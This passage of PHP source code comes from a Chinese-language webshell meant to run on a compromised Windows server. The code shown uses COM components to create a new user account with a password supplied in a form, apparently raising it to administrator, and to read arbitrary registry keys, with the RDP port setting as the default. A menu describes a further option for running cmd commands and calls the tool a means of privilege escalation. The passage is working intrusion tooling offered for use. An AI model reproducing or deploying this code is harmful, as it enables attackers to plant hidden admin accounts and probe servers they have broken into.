{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '内容: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
    }
}